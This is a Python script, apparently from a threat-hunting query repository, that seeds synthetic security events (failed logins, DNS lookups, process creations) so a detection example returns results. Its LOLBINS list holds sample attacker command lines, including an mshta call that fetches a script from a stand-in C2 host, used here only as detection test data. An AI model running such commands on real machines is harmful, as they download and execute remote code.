# Mirror of https://github.com/marcredhat/kql (synced 2026-06-08 13:23:58 +00:00).
# 142 lines, 4.8 KiB, Python.
#!/usr/bin/env python3
|
|
"""Seed synthetic OCSF-shaped events for docs/runnable_examples/*.pq.
|
|
|
|
The 90-day Okta+DNS+Process hunt joins three event families on
|
|
(userName, host). To make the query return at least one row at
|
|
startTime="2h", we ingest a small batch of events for two
|
|
user/host pairs that satisfy all three legs of the join inside
|
|
the last 2h window.
|
|
|
|
Events are flat JSON objects whose keys contain literal dots (the SDL
`json` parser indexes each dotted key as a column, so queries can
reference `event.login.userName`, `dns.question.name`,
`src.process.cmdline`, etc., exactly as written in the example PQ).
|
|
"""
|
|
from __future__ import annotations
|
|
|
|
import json
|
|
import sys
|
|
import time
|
|
import uuid
|
|
from datetime import datetime, timedelta, timezone
|
|
from pathlib import Path
|
|
|
|
ROOT = Path(__file__).resolve().parents[1]
|
|
sys.path.insert(0, str(ROOT))
|
|
from harness.sdl_client import upload_logs, power_query # noqa: E402
|
|
|
|
|
|
# Single anchor instant for the whole run: the current UTC time truncated to
# whole seconds. Every seeded timestamp is computed relative to this value so
# the batch is internally consistent.
NOW = datetime.now(tz=timezone.utc).replace(microsecond=0)
|
|
|
|
|
|
def iso(dt: datetime) -> str:
    """Format *dt* as an ISO-8601 UTC timestamp with millisecond precision.

    The result always ends in ``Z``. Timezone-aware datetimes are converted
    to UTC first so that the ``Z`` suffix is truthful; naive datetimes are
    formatted as-is (they are taken to already be in UTC). Sub-second
    precision is truncated to whole milliseconds rather than being replaced
    by a fixed ``.000``.

    Args:
        dt: The instant to format.

    Returns:
        A string shaped like ``2024-01-02T03:04:05.000Z``.
    """
    # Only aware datetimes can be shifted; astimezone() on a naive value
    # would silently assume the machine's local zone.
    if dt.utcoffset() is not None:
        dt = dt.astimezone(timezone.utc)
    millis = dt.microsecond // 1000
    return f"{dt.strftime('%Y-%m-%dT%H:%M:%S')}.{millis:03d}Z"
|
|
|
|
|
|
def in_recent(seconds_ago: int) -> datetime:
    """Return the instant *seconds_ago* seconds before the module anchor ``NOW``."""
    offset = timedelta(seconds=seconds_ago)
    return NOW - offset
|
|
|
|
|
|
# (user, host) pairs; build_events emits login, DNS and process events for each.
PAIRS: list[tuple[str, str]] = [
    ("alice@contoso.com", "host-alpha"),
    ("bob@contoso.com", "host-bravo"),
]

# Domain names used as `dns.question.name` in the seeded DNS events.
BAD_DOMAINS: list[str] = [
    "c2.example.com",
    "suspect.example.net",
]

# Command lines used as `src.process.cmdline` in the seeded process events.
LOLBINS: list[str] = [
    "powershell -enc JABm...",
    "rundll32.exe shell32,Control_RunDLL",
    "mshta.exe http://c2.example.com/p.hta",
]
|
|
|
|
|
|
def build_events(run_id: str) -> list[dict]:
    """Build the synthetic OCSF-flavored event batch for one seeding run.

    Every event is a FLAT dict whose keys contain literal dots (for example
    ``"event.category"``, not a nested ``{"event": {...}}``). SDL's
    uploadLogs with parser=json indexes each top-level JSON key as a column,
    and dotted names become dotted columns, so the published runnable example
    can reference `event.category`, `endpoint.name`, `dns.question.name`,
    `src.process.cmdline`, etc. just as it would on a real OCSF-mapped tenant
    (proven by harness/probe_dotted_keys.py).

    Booleans serialize to lowercase strings via _clean_attrs upstream, which
    is why the login flag is emitted as the string ``"false"`` and the
    example filters with `event.login.loginIsSuccessful = 'false'`.

    For each (user, host) in ``PAIRS`` the batch holds, in order: three
    failed logins, one DNS event per ``BAD_DOMAINS`` entry, and one process
    event per ``LOLBINS`` entry. The first event is stamped 60 seconds before
    ``NOW`` and each subsequent event a further 30 seconds into the past.

    Args:
        run_id: Value stored in every event's ``proof_run_id`` field.

    Returns:
        The list of event dicts, in generation order.
    """
    events: list[dict] = []
    age_seconds = 60

    def next_header() -> dict:
        # Fields shared by every event; also advances the age cursor so the
        # following event lands 30 seconds earlier.
        nonlocal age_seconds
        when = in_recent(age_seconds)
        age_seconds += 30
        return {
            "TimeGenerated": iso(when),
            "ts_epoch_ms": int(when.timestamp() * 1000),
            "proof_run_id": run_id,
        }

    for user, host in PAIRS:
        # Leg 1: failed sign-ins (event.category='logins').
        for _ in range(3):
            login = next_header()
            login["event.category"] = "logins"
            login["event.login.userName"] = user
            login["event.login.loginIsSuccessful"] = "false"
            login["endpoint.name"] = host
            events.append(login)

        # Leg 2: bad DNS lookups (event.type='DNS Resolved').
        for domain in BAD_DOMAINS:
            lookup = next_header()
            lookup["event.type"] = "DNS Resolved"
            lookup["dns.question.name"] = domain
            lookup["endpoint.name"] = host
            lookup["src.endpoint.user.name"] = user
            events.append(lookup)

        # Leg 3: suspicious processes (event.type='Process Creation').
        for cmdline in LOLBINS:
            proc = next_header()
            proc["event.type"] = "Process Creation"
            proc["endpoint.name"] = host
            proc["src.process.cmdline"] = cmdline
            proc["src.process.user"] = user
            events.append(proc)

    return events
|
|
|
|
|
|
def main() -> int:
    """Seed the synthetic events, wait for them to be indexed, record the run id.

    Steps:
      1. Generate a unique run id and build the event batch.
      2. Upload the batch as newline-delimited JSON via ``upload_logs``.
      3. Poll ``power_query`` (up to 30 times, 2 seconds apart) until the
         count of events carrying this run id reaches the batch size.
      4. Write the run id to ``sample_data/runnable_examples_run_id.txt``
         under ``ROOT``, creating the directory if it does not exist.

    Returns:
        1 if the upload response's ``status`` is not ``"success"``;
        otherwise 0 (a polling timeout is reported but is not an error).
    """
    run_id = f"run-runnable-{uuid.uuid4().hex[:10]}"
    events = build_events(run_id)
    # One JSON object per line.
    body = "\n".join(json.dumps(e, default=str) for e in events)
    print(f"[seed_runnable_examples] events = {len(events)}")
    print(f"[seed_runnable_examples] run_id = {run_id}")
    print(f"[seed_runnable_examples] anchor = {NOW.isoformat()}")

    r = upload_logs(body, server_host="kql-proof",
                    logfile="runnable-examples.jsonl", parser="json")
    if r.get("status") != "success":
        print(f"uploadLogs rejected: {r}")
        return 1

    # Poll until indexed (use proof_run_id which is unique per run).
    print("Waiting for indexing", end="", flush=True)
    for _ in range(30):
        time.sleep(2)
        # NOTE(review): "30m" is presumably the query's look-back window --
        # confirm against harness.sdl_client.power_query.
        resp = power_query(f"proof_run_id='{run_id}' | group n=count()", "30m")
        vals = resp.get("values") or []
        # Treat a missing/empty/None result as "nothing indexed yet".
        n = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
        print(f" {n}", end="", flush=True)
        if n >= len(events):
            print(" ✓ ready")
            break
    else:
        # Loop exhausted without reaching the expected count.
        print(" (timeout, continuing)")

    out = ROOT / "sample_data" / "runnable_examples_run_id.txt"
    # The events are already uploaded at this point; make sure a missing
    # directory cannot cause the run id to be lost.
    out.parent.mkdir(parents=True, exist_ok=True)
    out.write_text(run_id, encoding="utf-8")
    print(f"Wrote {out}")
    return 0
|
|
|
|
|
|
# Script entry point: propagate main()'s return value as the process exit code.
if __name__ == "__main__":
    raise SystemExit(main())
|